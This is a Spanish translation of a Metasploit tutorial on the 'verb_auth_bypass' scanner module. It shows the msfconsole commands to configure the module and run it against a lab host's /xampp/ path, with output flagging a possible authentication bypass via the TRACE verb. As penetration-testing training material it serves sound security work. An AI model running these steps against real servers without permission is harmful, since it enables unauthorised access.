Http/verb auth bypass

De www.metasploit-es.com.ar

El modulo "verb_auth_bypass" escanea un servidor o rango de servidores e intenta puentear la autenticacion utilizando diferentes verbos HTTP.

msf > use auxiliary/scanner/http/verb_auth_bypass
msf auxiliary(verb_auth_bypass) > show options

Module options (auxiliary/scanner/http/verb_auth_bypass):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The path to test
   Proxies                   no        Use a proxy chain
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

Configuramos este modulo definiendo la ruta a la pagina que requiere autenticacion, definimos nuestro valor RHOSTS y ejecutamos el escaner.

msf auxiliary(verb_auth_bypass) > set PATH /xampp/
PATH => /xampp/
msf auxiliary(verb_auth_bypass) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(verb_auth_bypass) > run

[*] 192.168.1.201 requires authentication: Basic realm="xampp user" [401]
[*] Testing verb HEAD resp code: [401]
[*] Testing verb TRACE resp code: [200]
[*] Possible authentication bypass with verb TRACE code 200
[*] Testing verb TRACK resp code: [401]
[*] Testing verb WMAP resp code: [401]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(verb_auth_bypass) >

Leyendo los codigos de estado devueltos, el modulo indica que hay un potencial auth bypass utilizando el verbo TRACE en nuestro objetivo.

• http/tomcat_mgr_login
• http/webdav_scanner

Original de www.offensive-security.com
Traducido por cbk999